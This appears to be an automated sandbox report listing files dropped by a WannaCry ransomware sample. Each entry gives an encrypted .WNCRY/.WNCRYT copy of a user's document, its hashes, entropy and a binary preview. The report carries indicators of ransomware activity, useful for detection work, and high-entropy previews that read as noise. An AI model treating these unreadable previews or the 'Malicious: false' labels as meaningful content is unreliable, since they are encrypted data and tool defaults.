SSDEEP:	24:bkUVdtVY541GH31TXQT1zSeg4PL7AvEh0UUV+Dt2EOqDra7GZx:bkUVvVPGXdebg4PL70UM+sJIqG3
MD5:	E98B27631C9736E7DB50AEBC5EC4B6C0
SHA1:	976C71C9A912B5B8F4DACA6A1EEB9E1CE2D1532A
SHA-256:	F99818A6A40B10F62B33D06712D952E7B45AA87C843E41E7EF41FA088E03AB21
SHA-512:	C3E7AE6A62A21B8BF5EA58F3B7E2C0F44F44BA302169AD467967E548513CA47A8C21ECA09CC491EDCFA3897BA532579A5F4E00EC5BD0A76FF07B98B9494E3CE2
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....of.PQ..$..T._..4v....,3....h........].X..I..b.].iR.tLLa....S..UoWIh.A."..U`...,mC.aDj...d..R0B!..Ys.w.6...v..v[g.U..e....RQ~G...Y...wn......\|Fv+...d/....$G.L.........]..;7\..9.V..i...'.\..u.\..0.]p.b.Jm'.r$.`.-g..T^J...GK>n.........j.DD.]qF...d............q.K..l..2,_..<D...f......P..V..g...p... ...d.,.C....U.........XZ./Q.".....~.k.j..$'..o.+lI..h#.]i..nx8.f.MW.I.Y.."..x;...5)g....2......?...wh..;.j.i....&.`.^qWB...}.j..5\.Q...\.6.f...G.6..D...).!.30.0I..f%A.M..R....f....&. k.....b.Af@.-l4qg._...Z."!,v.@<..i.1....S.jh..E.u;...0...Dm.4v.Q...h`.da....1s..I..9tq."=.x....Ka.>~...^.p..m<>.....6.E"..aC(...5...~...^..J..vG...Z.[.;k.RL..-..I.N'.9s>......+.../.a.q.'.....=/...-......\|....9.P..F;.....WH..j...Y..~..D.N.Q.7.o.w..@#(.[N.\|.*.....S^.x...).;B.....^..s.qAp)....g4..\.L...6..y..=G.[.;..tA.F[.x/L..8..Vn4bL....0...s.#..s.....cp...e.2E.r..).qq._o.Jm._.........4.B+.k-.W.%..y$.~o\|G.%..`.6.k.c.....}..N...Y...y..7.V..c...n[.G....To.....z...hm...G

C:\Users\user\Documents\GIGIYTFFYT\GIGIYTFFYT.docx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.8148380862196225
Encrypted:	false
SSDEEP:	24:aAwVVoRr/5lRWKdL/3QppPEyQU4rA4wUdOn6YQCY8P:fwVVMr/rRZifQU4c4wsYP
MD5:	A8D0B8419800CAFFF650B7FACA43AB1B
SHA1:	BADDA0774D2DFC8C484FB801ABF4C3FE918C3DBD
SHA-256:	6F200BC7AD6873E36BDA41AF0918B9A92D81F2C876D7E3E152EBBFC8329BD3B4
SHA-512:	0E0C2467E3506AB3D9B50A40E3264EA48C754F0FA1B94112C0D37AACA1C022D9B41265DD2DF721C67D52699368DD99AF9C4FB88C516E0660A78D497773335D45
Malicious:	false
Reputation:	unknown
Preview:	......5#$2.fO....b5.U=.._u....>-....t.....?.......w.v...<.=...D.tN.(s...Q....+...Q6.^ .}C.a.e....\|.+.5....fJ....'....J..}n.e.&.+.M&qZ.$..,.....$...d.c.A..F.O\|...4.5.....-8......]2......z......;...5+..KG_.\|#U/.n..4re.Q..T.........\{.P.M$.S..Hdt~....L.c....N....B4,..t...:.ch.ls....:.."\.MF0P,.......lZ..@.nC.w."".7r.d.S.....z......I.a.t....7.\$6.)..#@.R...q.i....W....j]....c8..#..C...cnezi...B.D..g..s.L.be..M.`...f.......y...g.1&}.....6wI9..8y...P.[.3...;....kG.k..N.k...T...L..`..W..!'%..}/G..Z..Yf.....r.....A..K.S....#......H...T).-..+.....2..W._.J..G.N.....[ .......\|2T......~.'.....2.)o!rB..!\.......d,...#..........Kzsfr..#r...#.~.KU......=.......Y.L.j....[..?.A.a..}K.....?Ac.?..mZ....P...w%RxRA'.0..g-..v..%.a/&Xm.98..X..%....4,R....t2.....U...9...Fu.6.W....(N....94H..1...p.U....'mZ..Cq...S.j*F...<e....y./.a...0.Lv.w..6.e.A[..R.d.\|M?T...n...M..U....m.w1.........f)V.V...q$.B&T...kK..R..\|...u..P..).?f.[>.5.S.S...N.m..&...9....2.R.P..&_..0..3....

C:\Users\user\Documents\GIGIYTFFYT\GIGIYTFFYT.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.84936254442299
Encrypted:	false
SSDEEP:	24:bkz0CDaG5ln6EY65B1tYWXos7wbmjVScDEOuPNbQZW:bkz0y5VRJtYWb7wbqScbytWW
MD5:	F2789F0546FA76DF9577CBEAC24CF46D
SHA1:	5F71E377F5D81E63B3BF1B78B2F219EC6332FF59
SHA-256:	C0B2E3C8B9F721DE83A506318CDBD8D509380BACCBB741D6698CBA86B90544F5
SHA-512:	B19C1F76EDEE69B363AAF8A138F69C2B095DED675DE3C768244F55CD1F8CADA6C9F9D83BD206B747DD3BB853D02C50BFFF9D7DB4DF6DCF31A8714DC85DA0A9D8
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....@.<..C..;\D....N......z.U.Pm.a.\|.b..zd..*..q..Y.t..W.q...)..i..c!..Y...$..9./.&fS...r"-j.r.."..x..>#....&v..O...O.l.......G..U:.Q...0x..$.fbU.J..)hc...on...{.v.....F~...j...">.VL...-.p4Ot.D..9.u....C..%...D.....S.....T.i(^.9..]....p`....@.6.............{7...8W....f.6..... G../..3..e.-E.D............f..."i....g].....].Q{.qq..u.....b....yY..k..../.g2..&/...(....-S...........`k_...r..C..#b.."....U..d.`!..)..R.X..+.#H&OQ..Z.b..y.R..-V...P.]...()...Y\|k.j%......Jb...'.UND..@b..j.n..GX.$...Sa2Z9.:...E4KJ...n.S.IF.x.....w.w.@@.t.`...&P.F...t........U......l..11....r..\|.Atc.a _.(.&c..iC..s..s..K;#qEQ.~..a.r.....81....G&D.......V.x./T.y.>.......?..\...."M.u..f.^...v.S....te......}r.c<W.9.T.....S.]......V...l?j..#\=../.<J,.E[aN.K.......nZ...2#.c=.d....J.{[..`.,I0.F{.%0...b-.{..a...[....MW.A.F3z@.(..5.N\|.....2Z_s..e......P.t...I...38...A...2._.H...K....;x.1...M..>ss\|Gq`Ig.......:_l".yp...(.>..x....(............::......;....N.j....

C:\Users\user\Documents\GIGIYTFFYT\GIGIYTFFYT.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.84936254442299
Encrypted:	false
SSDEEP:	24:bkz0CDaG5ln6EY65B1tYWXos7wbmjVScDEOuPNbQZW:bkz0y5VRJtYWb7wbqScbytWW
MD5:	F2789F0546FA76DF9577CBEAC24CF46D
SHA1:	5F71E377F5D81E63B3BF1B78B2F219EC6332FF59
SHA-256:	C0B2E3C8B9F721DE83A506318CDBD8D509380BACCBB741D6698CBA86B90544F5
SHA-512:	B19C1F76EDEE69B363AAF8A138F69C2B095DED675DE3C768244F55CD1F8CADA6C9F9D83BD206B747DD3BB853D02C50BFFF9D7DB4DF6DCF31A8714DC85DA0A9D8
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....@.<..C..;\D....N......z.U.Pm.a.\|.b..zd..*..q..Y.t..W.q...)..i..c!..Y...$..9./.&fS...r"-j.r.."..x..>#....&v..O...O.l.......G..U:.Q...0x..$.fbU.J..)hc...on...{.v.....F~...j...">.VL...-.p4Ot.D..9.u....C..%...D.....S.....T.i(^.9..]....p`....@.6.............{7...8W....f.6..... G../..3..e.-E.D............f..."i....g].....].Q{.qq..u.....b....yY..k..../.g2..&/...(....-S...........`k_...r..C..#b.."....U..d.`!..)..R.X..+.#H&OQ..Z.b..y.R..-V...P.]...()...Y\|k.j%......Jb...'.UND..@b..j.n..GX.$...Sa2Z9.:...E4KJ...n.S.IF.x.....w.w.@@.t.`...&P.F...t........U......l..11....r..\|.Atc.a _.(.&c..iC..s..s..K;#qEQ.~..a.r.....81....G&D.......V.x./T.y.>.......?..\...."M.u..f.^...v.S....te......}r.c<W.9.T.....S.]......V...l?j..#\=../.<J,.E[aN.K.......nZ...2#.c=.d....J.{[..`.,I0.F{.%0...b-.{..a...[....MW.A.F3z@.(..5.N\|.....2Z_s..e......P.t...I...38...A...2._.H...K....;x.1...M..>ss\|Gq`Ig.......:_l".yp...(.>..x....(............::......;....N.j....

C:\Users\user\Documents\GIGIYTFFYT\QCOILOQIKC.pdf

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.809853930949499
Encrypted:	false
SSDEEP:	24:vTR9bBp4EPPvrlvdw/QyGYoyqTaNZlkP4IgV0kcJvPh6H:v/j/rlU9GYxNPdqkonhE
MD5:	4A15D3B300F8AD1C32A6F099D48AFBFA
SHA1:	1BEA3D93D621CBF72CA2B6FCC1DC56EDC17749A2
SHA-256:	E9FDEE47BBB996E6B261CE451B82976A9C421238D4BAA034CA3DAC25593EE41B
SHA-512:	8F594A35FF775B72F7C3C48B878D0A2374E090FE41AB644E66B9CDFA2C19282179F373A3A45E59ABD16C0C445EF14CBBA3A17EA272B78A81175ECB5ECDFEBA26
Malicious:	false
Reputation:	unknown
Preview:	-....]....O...oz.ZA...wrl"!.\...y.v..@....M.....<3\|.=......O....,..N..'.... ^}..r.(....V:.-a..g.g...n.....p.v...:...wB~j.\a.H.Hz.2lGpc.4c.k...2.. ..=.b/.g.......%....- ...g~.Z...}...U.>`Mr....Q7.....P$..Q.N.E........@.z.bi2..%....(D}vS[.`.v.(q5p..?<.o....%G.._..6i`,.c..2.v..!.^...k.........O.... .c.G.o...Z..T.A..Y/~[.....w4..\.t.0zk..Q5.............o.E...)Gs..-.4.N.l.$L.e..5..:....,...c...y.]......Pp".v...=(2~.`.....1.+..V....:.<f........D].I=,!)J.4.......2..$;......+..tt......TI2odV6..=,<Kd...HYJ..].\l...aX..M.M..?....../.+...t.I6.-.y.....<}.pd=.....s..&..<.....h...U.{X......N).].A....p...H.............E.#?.x..'\|u.;..e6/.0.... ......3...39or.0...cmv#-....W..`...d.IW..R,....7....t.E...Q3.Z.......3v.1.s3...\...g`F.-.....{._.R.$bU..3a...}.O..J.....)....N...6.o....t.N[.a.).....{,.u....\K.O5.Y.V".....{o..@.!.g.}.1...<VC......a;.a..:O0^.\|.PM}:..P.X..g.'..H5.{....8f.....$...z...Gq..P)..&_..f.68..{.&..<....^X[u2\..KPeN.....j).@9....oY(&...

C:\Users\user\Documents\GIGIYTFFYT\QCOILOQIKC.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.831274101816335
Encrypted:	false
SSDEEP:	24:bkLRkVKPg1Q/p4CSGFvvxvX6IQHeuvP0pbbRHuwrenBC99IPreWwv+cVe6iK9kMt:bkLJg6/p48vF6IQHeuvP6ROo9V+cVe6P
MD5:	EA9EFF0D63F1ABB6AC65BAC625C5F50C
SHA1:	F38F40884D933A5B03E4CE866E34315484869CDA
SHA-256:	E84EDA983D08A6B2F69B5499308B72D95A1A38F1A67933364267E1E947F7BCFB
SHA-512:	A53AAB992F8BA0D408534C84B50D9EF4710E23CA7EFD5124CA348E9E2AE5475EC76062C8CB4DC3C44D1CE6131615956ECA0D69E4FA0F4433570E9F80B4BA96FA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....?..RlS.......{l.........x...B......G$c}~...Q....&.P....s..^...f.....h...s.}....;.#9.E.Y.?...3Lu.(@.(...R.....].l......Elk......X...B.Cn.ca.l.).....`.......h.....+U.........s...E1V.....}....6M........a8iQ...-...[Z3.L..D..L.Y'...v1Bo.h-5..R.................dk}.0=.\|T..IqL........?...t...#H...&.).?.(......."..zM.#....V.....6...e..P4...e.O5.%....._+2>Zl....H...h.E.]/B.._.:l...\|<2J.MM..2g.[...`.J6.UR..0.8...."t;.;.F.....(..yG..........e..^.MZ.L....m..Y:.........Ga/g.g..c...3b..-[...z....{..j0KI..i.x{.[ u.[.^.bE...Q0...7d...........#.........7.{.u....~...e..N...N...[R=.1b...[......G.3.!._...Q>.....sU1j....\.uv.o....W;...D.n.o....N..%..>T...I......e.n......^.#..=..!>.a.eB..+...S.x...ux..Z...EMy-......m\....6.d\|....U...G..L... C......w.....(.._...W..d.v.H..!e..5.@.0.T...W""...s.C.eqW%.&.._]...w.$3.,4.OJ.....15\|.../A.#b`..?.....:......`...X......s..nr{.....B...l.....y.A.0...n.".M.....:+C..h...Aa....b....'..]...}...f..ZA../..x..=.]x

C:\Users\user\Documents\GIGIYTFFYT\QCOILOQIKC.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.831274101816335
Encrypted:	false
SSDEEP:	24:bkLRkVKPg1Q/p4CSGFvvxvX6IQHeuvP0pbbRHuwrenBC99IPreWwv+cVe6iK9kMt:bkLJg6/p48vF6IQHeuvP6ROo9V+cVe6P
MD5:	EA9EFF0D63F1ABB6AC65BAC625C5F50C
SHA1:	F38F40884D933A5B03E4CE866E34315484869CDA
SHA-256:	E84EDA983D08A6B2F69B5499308B72D95A1A38F1A67933364267E1E947F7BCFB
SHA-512:	A53AAB992F8BA0D408534C84B50D9EF4710E23CA7EFD5124CA348E9E2AE5475EC76062C8CB4DC3C44D1CE6131615956ECA0D69E4FA0F4433570E9F80B4BA96FA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....?..RlS.......{l.........x...B......G$c}~...Q....&.P....s..^...f.....h...s.}....;.#9.E.Y.?...3Lu.(@.(...R.....].l......Elk......X...B.Cn.ca.l.).....`.......h.....+U.........s...E1V.....}....6M........a8iQ...-...[Z3.L..D..L.Y'...v1Bo.h-5..R.................dk}.0=.\|T..IqL........?...t...#H...&.).?.(......."..zM.#....V.....6...e..P4...e.O5.%....._+2>Zl....H...h.E.]/B.._.:l...\|<2J.MM..2g.[...`.J6.UR..0.8...."t;.;.F.....(..yG..........e..^.MZ.L....m..Y:.........Ga/g.g..c...3b..-[...z....{..j0KI..i.x{.[ u.[.^.bE...Q0...7d...........#.........7.{.u....~...e..N...N...[R=.1b...[......G.3.!._...Q>.....sU1j....\.uv.o....W;...D.n.o....N..%..>T...I......e.n......^.#..=..!>.a.eB..+...S.x...ux..Z...EMy-......m\....6.d\|....U...G..L... C......w.....(.._...W..d.v.H..!e..5.@.0.T...W""...s.C.eqW%.&.._]...w.$3.,4.OJ.....15\|.../A.#b`..?.....:......`...X......s..nr{.....B...l.....y.A.0...n.".M.....:+C..h...Aa....b....'..]...}...f..ZA../..x..=.]x

C:\Users\user\Documents\GIGIYTFFYT\TQDFJHPUIU.xlsx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.842730061655697
Encrypted:	false
SSDEEP:	24:tyOw+ZwqRnbTfGiuaOwMU5gYw1T1bVpQcBrqc0/t75:UP1q13GiXMggYw51tqckN
MD5:	8C7E70086351732E2D158EA96F73256F
SHA1:	A28C095445E0FBC276ED16B7510262489DF76FC7
SHA-256:	9CA329644117DC13B12BA65DCA6B7B10E20735BD545F187B2B70D6F89E3F740B
SHA-512:	8483A484C2F988DED2219C9FB8F5B3C49BDDDA618AA52B3D833E6B482AF6D07BEE0CCBDAE1FB5E9467387015355DD7FD3314050F7C14477AEB0A3FA0EC504C12
Malicious:	false
Reputation:	unknown
Preview:	..L........iY.s.t.......IB..w..4...Y.Y..t.3.%.tM.[g.GC.~+8.......O&;.JQ0..\.D...F.\D......Z..ES...ibn.D`$.K...s.[....N$....;.5..S zT.....cF..i..X.{U.Cq..y<..a.R..t.".Oe...l.o2...I..w...!...((S&^.Q../........-.....YL3.B.f.\M.....z._~_.Ee.......+..&.3lw..3".&..wW`V...U..$...<.&...20q.L.r.g3..x.q......u..h.~.q...tg..J...k.Y../.A.p...`.x...=....9.(.........z,]....\..$...q..b.^..^.....R....m.H..-...\|48....3y.-.M...h...lA.>..7.x]..c...`..&....,.W$..O..x..,.=D....@.lX....%.?#.\...."..H.o.....I...U!..!.....p....8Rji.+.:~D..K.fr....2.\e.........o..a/.(.......w.1@.....Sc..v?........K.B.R....H6C.e.gw}..zz]KM.r7.[.N.G.@.H.2..%.S.D.x.$\.+...\|.....)..Z.;7.,e...D.....^m...%E%......CD8b[...E ...y.fE.c..-.'.?>i3N..G..M...v.;....~.f....H1.}...XE?.......:..j).....tG......G.......M.-......:.*.../NJ.7-...%..k...z..G..A....1.@.#..j.....V....pO..@...O.gL..o.;.......C.J_....a.x....`&243l...JM..L.h.....dU;.Z.S...;..#......[P.qD...

C:\Users\user\Documents\GIGIYTFFYT\TQDFJHPUIU.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.868419814264724
Encrypted:	false
SSDEEP:	24:bkdD4zbr045xlgUaD72rGXwP0JUs01yA3gugs8g45Dz+jfovF2ru:bkMbrn54Z6EJUVRgu98HVD1
MD5:	BAF0C853D9BFB5A3F75DAEF4FCEDFF5E
SHA1:	ACF67E04A2571AB797C96ACF7DE34A16DBFFCB1B
SHA-256:	9CE5F439F95F5BEC2A07C439B20E2C81E38DD27E3E07AA6C300C2E3A5FB154E5
SHA-512:	3E88C425A7DF4DF1FA2AF20D04563084C79C82FD2B7626F3775C2B3BE685B6AA9480C9555F3BA42308FD0187AE45F53A9E696D7CE02FF6AE796B52248C60D6C2
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...../..E..)..L.\.5..8.O.\|..\!..Q..:.MWcK..ag..}c.....t\|...>...=..v..6.~.5..R.k........zC...p.&..:...Q.`U5.....)...G.?...!.e..V.i...i.[..~.s..V.....=..9D..s$...._..X..:...!.f.%lxGY.'...E.....<h.`T).(.$......?.(r.-..U...vR.+....V.....%.N......k.H...............r.t.d2..)..H.PX....~J.........."'....7.+F;..Ep-..)...I.7.`...W.ru...g...OP1...z.......?.._..o.`.&.#..rB+..g3....P.b...:X).@p...D<.8[1q..}\L.o..6. ..H..U......T.j?..Q."M7...* %~..6{..7...Td@.Y0...&#.b...J..-...JP.....9Z=n.....Em ^E.\!..fU....tqx.o......C..R.Z..N..F......-.+........!VC...T/.hNJ......!.P..]y..4.<_..J.F...z..yd..,jyDK..e.U.!T%u......)..l.L..g..v..+....gp..U....... '.K.R....f...W,LV..1.1..4..1>R@.H({..Y</?A...NN..(.0..,..N...Y.-....Y_.-.....L7..x_..L?..L.Vxg.C...8...r...IZ.;v..z..~.fg.?...`....Y.'.Fpw.B.4...%EZ.C...G....\..y...g..{.h..7.d..b...3.`........=Y....6.2...I.v.......{DP.fo.r..+.2..7.y..p*...l.}./...........a"..5.>.wey.m..&.....i......j...E..4

C:\Users\user\Documents\GIGIYTFFYT\TQDFJHPUIU.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.868419814264724
Encrypted:	false
SSDEEP:	24:bkdD4zbr045xlgUaD72rGXwP0JUs01yA3gugs8g45Dz+jfovF2ru:bkMbrn54Z6EJUVRgu98HVD1
MD5:	BAF0C853D9BFB5A3F75DAEF4FCEDFF5E
SHA1:	ACF67E04A2571AB797C96ACF7DE34A16DBFFCB1B
SHA-256:	9CE5F439F95F5BEC2A07C439B20E2C81E38DD27E3E07AA6C300C2E3A5FB154E5
SHA-512:	3E88C425A7DF4DF1FA2AF20D04563084C79C82FD2B7626F3775C2B3BE685B6AA9480C9555F3BA42308FD0187AE45F53A9E696D7CE02FF6AE796B52248C60D6C2
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...../..E..)..L.\.5..8.O.\|..\!..Q..:.MWcK..ag..}c.....t\|...>...=..v..6.~.5..R.k........zC...p.&..:...Q.`U5.....)...G.?...!.e..V.i...i.[..~.s..V.....=..9D..s$...._..X..:...!.f.%lxGY.'...E.....<h.`T).(.$......?.(r.-..U...vR.+....V.....%.N......k.H...............r.t.d2..)..H.PX....~J.........."'....7.+F;..Ep-..)...I.7.`...W.ru...g...OP1...z.......?.._..o.`.&.#..rB+..g3....P.b...:X).@p...D<.8[1q..}\L.o..6. ..H..U......T.j?..Q."M7...* %~..6{..7...Td@.Y0...&#.b...J..-...JP.....9Z=n.....Em ^E.\!..fU....tqx.o......C..R.Z..N..F......-.+........!VC...T/.hNJ......!.P..]y..4.<_..J.F...z..yd..,jyDK..e.U.!T%u......)..l.L..g..v..+....gp..U....... '.K.R....f...W,LV..1.1..4..1>R@.H({..Y</?A...NN..(.0..,..N...Y.-....Y_.-.....L7..x_..L?..L.Vxg.C...8...r...IZ.;v..z..~.fg.?...`....Y.'.Fpw.B.4...%EZ.C...G....\..y...g..{.h..7.d..b...3.`........=Y....6.2...I.v.......{DP.fo.r..+.2..7.y..p*...l.}./...........a"..5.>.wey.m..&.....i......j...E..4

C:\Users\user\Documents\GIGIYTFFYT\UNKRLCVOHV.mp3

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.789359512777786
Encrypted:	false
SSDEEP:	24:mWfn2dZYRXrdh5jrPBOuHUJ1VYKgcsFuEXCnLLuNHF2Y9t0j+V:rnEYRXrdh5Hp3U/+KjsFPXCHIpt02
MD5:	30CBB8932F6ABFC5946DDF6BBED34065
SHA1:	BB591652C80CE61AFF69BE33B00013D8FCEC45A2
SHA-256:	3CDD80893E506895A1C00345DDE039B63D7CF0A9089575E46D02F3C30A4AE8AA
SHA-512:	18FC476BBB8E823581C295703A4957489A46284E21B3100335EE7C3553A4690B21F00FE0B78E9D7D661FD1CE7C4D2800C815619BA0566CF5592808EA6FC1453E
Malicious:	false
Reputation:	unknown
Preview:	./.-.5.<M.Y.....l...a.@...Bd.<........r-0W.g].w:..C.B..'_F ..Y...e{&..d.."Q..I.d.....E...........6...Lp..Qj...oae@.(ek%(N...HI ....M.?......i.?...M..&....S#.)....z....._....V............^...`.wif)."...p.&....)@d...J....\|..q[....P.tG?...I.~.5.lN....f.}.C&.j..S.uP.....6..?27I...H..vIG$.....A.X8....s..t....+r...Y6c..I..'u..l.a.{.j6yJ\S..;...k..]`Y.]g..P.cI\.er]u...........I8Q..`.....5.He2hYN...Z$..A...yG.DG......5ZPf.F....-..9.fT7P.Z.w..h.:...7}.$\|.J...v(....<S....ru..u...x^.1@WA+.t..6.... g..f.Ts1X_..j........}..c..^...&4.'0]...a..{..!.kSz,.w..FcuS.&u...R..z.K..Gf..su_z.ws..F...F.....5_.+.....\%P..J..o.......C...F%....j..{B..s...xD...B\|..R.L...z[0.3..r.M:.d....R.s.....'...G?...j<.................e\`t{c.Aj5.r.....v.'pDk.'zf..../tV...X..~0o.~..y.x.E.5.s..LK~(Z....@O... .h+....v.c./0." F..uFN.vw).Lo..(...R?o'..d^.....j.;Vvm.n.H..WR..'.0..X..TU...z,.~..>3.,....K...@...n.n...S......v.E.W.#.....c..\|0..7(.....O.D...K...y....an&2P.]..!...`>.d3.\|.....Jk.

C:\Users\user\Documents\GIGIYTFFYT\UNKRLCVOHV.mp3.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.826553258040899
Encrypted:	false
SSDEEP:	24:bkkXQlUtDynelZYiXMCPS64OImD9O11Hz4Gk6i3gc5lADaopuTbl/e6fkg2ZZr:bkgQaDyeJ8m5IhjHjAxgbwTlNuZZr
MD5:	23648BF5B47BFE2F834E3D698A79BC58
SHA1:	DA6C61AD7893A00A450375CC89455957D418F45D
SHA-256:	0392BAEFFC6E7754F29460093D2FDA579CABA4645B896C19F13075120CB3CB86
SHA-512:	F5D554A699C8157972FE100906E3ABA93646A660EAE5B5F203CAC34E637EB33FAE7A4E6A53CAB5FC4385BAC6D768DAD5043DC770F164AA7D0AAF4D1BE610A68F
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....T.I5.o.!....;...\|.. ..l..`U......fp5....d[.'@..4........\....M.R..sU=..voW.D..D.2&.....{...l...i.C.K..8..R..z..&.<trG........O.....Q.......9..Q0&.....my.&.~.;._d..\|.i.E..h.{..E...L..7....P7=....c...\.`Bw.o.m6..<..U.w...2WBs0v...<.n_....'7~......................f#...O.lG...(l.IB...K..LU..H..9...fFk..#r.{xz.:.p..=.1.7fuc.a%~w.V.l...tl.W.....o...w..}..q.;j........l...7u.f.p.P.`..{.4...u......:6..K.R....q U...Kgi..`K.!.....(...."7..X.........?.m...?..M...b:...jO..W..um.#j....y.......}.]....Bo ..7.=.(....]+...~.YX..s.... >.i.g.....(..D..........].... ..R.z7....Y\|..w.C.ze..l.1..\..G.R.....G.0.\;...........4.U6..42......%....m...\|.PK......<....I.......g.s.\|.q{.k.m.)..Bh...w..y...h.j9..Q..8..>...+.. ..]..8\|......mZ...{..p....u.P.u..:........1...\|..".e...=B.3R.T.......N..\.)..5....&..B.R.uj,.mQ..:g..e..._.vv2.z.S..P..d.Vc.j.va.3.#....eo..\|...zP.[0by.....';.....&..K].>8gL...`%..5..b.../.......e.lBH.>;.gZ.i...C..S..O.F......V...LWp.

C:\Users\user\Documents\GIGIYTFFYT\UNKRLCVOHV.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.826553258040899
Encrypted:	false
SSDEEP:	24:bkkXQlUtDynelZYiXMCPS64OImD9O11Hz4Gk6i3gc5lADaopuTbl/e6fkg2ZZr:bkgQaDyeJ8m5IhjHjAxgbwTlNuZZr
MD5:	23648BF5B47BFE2F834E3D698A79BC58
SHA1:	DA6C61AD7893A00A450375CC89455957D418F45D
SHA-256:	0392BAEFFC6E7754F29460093D2FDA579CABA4645B896C19F13075120CB3CB86
SHA-512:	F5D554A699C8157972FE100906E3ABA93646A660EAE5B5F203CAC34E637EB33FAE7A4E6A53CAB5FC4385BAC6D768DAD5043DC770F164AA7D0AAF4D1BE610A68F
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....T.I5.o.!....;...\|.. ..l..`U......fp5....d[.'@..4........\....M.R..sU=..voW.D..D.2&.....{...l...i.C.K..8..R..z..&.<trG........O.....Q.......9..Q0&.....my.&.~.;._d..\|.i.E..h.{..E...L..7....P7=....c...\.`Bw.o.m6..<..U.w...2WBs0v...<.n_....'7~......................f#...O.lG...(l.IB...K..LU..H..9...fFk..#r.{xz.:.p..=.1.7fuc.a%~w.V.l...tl.W.....o...w..}..q.;j........l...7u.f.p.P.`..{.4...u......:6..K.R....q U...Kgi..`K.!.....(...."7..X.........?.m...?..M...b:...jO..W..um.#j....y.......}.]....Bo ..7.=.(....]+...~.YX..s.... >.i.g.....(..D..........].... ..R.z7....Y\|..w.C.ze..l.1..\..G.R.....G.0.\;...........4.U6..42......%....m...\|.PK......<....I.......g.s.\|.q{.k.m.)..Bh...w..y...h.j9..Q..8..>...+.. ..]..8\|......mZ...{..p....u.P.u..:........1...\|..".e...=B.3R.T.......N..\.)..5....&..B.R.uj,.mQ..:g..e..._.vv2.z.S..P..d.Vc.j.va.3.#....eo..\|...zP.[0by.....';.....&..K].>8gL...`%..5..b.../.......e.lBH.>;.gZ.i...C..S..O.F......V...LWp.

C:\Users\user\Documents\GIGIYTFFYT\ZIPXYXWIOY.jpg

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.802375723310667
Encrypted:	false
SSDEEP:	24:dkBHntMLWHwXa2Ne9m8PLMj6TD2aZ6h0ja+8HlZ:doNMLWHGa2gNjMW/7664FZ
MD5:	7F5AEA118984351DF4A7EAF257A793B1
SHA1:	1FA75723E296DE3B57ABC6536855AF0237BFBC33
SHA-256:	5F5B1B2AD7AB91E72106883A123A3D11D6DF5103597DAD75EE248809C13F5331
SHA-512:	860A59106C7E49621AC4E60E91959538A16FCBB615285C5A5AEED3F7EAFE61419B06EC12044F70BA27CF37EB4D60E90B87F229B36EBE067F54EA1193ADECC419
Malicious:	false
Reputation:	unknown
Preview:	...].&:..Q0...._.i...%....N..sB.2.....+..-g@ZI......4....(.O.Y."..Y.A.#t..d`..B...H......?..:..:.....B.9...1A..#@a.\|.....O.\.....v..q+...x._.....AE.Yk....o.x.xD.7..._%.u.D{.....0.._}.J]HS..Y...1..-..cF...Z^.i. .<~......d..s....8,..+a.........U.R.'W....)...q:/.9.....r.....6.s.....s"..ni....LY@.3.7....vN=t..#..R...........~Z.. .1..z....L.}..+~..aw..i9..jaw...(......c?$l..}.O$.A..u"'..O......).......\qVf.`..z......GC./..Bxn..2.xX.9.c..T...S..o.z..+.o0<..?...x(....%/.e.?......X...$R.AB...1.XD.......#=..p.r..9...8...].x....d..+...Sf.z..."..H.5.H.5.0.1.....6..M.....Kt.A...J.R]6\...jS.i%.mK.3.....7..g.:3.(/iX.%....."....t~..~...;.n..(..,...&..8....`B.5.)j....L.+b.8..+i(..l.../.......1}...U }a...#..3;.x.o.?@.....C:.xG..&F.....P.......K..,..`..6a".e...7.......J...qn!...?/Z....-.^.,...~..u..r.....M..Z.q.........Z..$L..........Nk.~..~R..m....ub.)..a.m&....{g`..P.).>..o.F._.o.@..l.\|BO.$....h...Q..g......Y?.).#.n....c-U.0...L.R.#C...fS..W..Dh;...8.QH.

C:\Users\user\Documents\GIGIYTFFYT\ZIPXYXWIOY.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.852491824744748
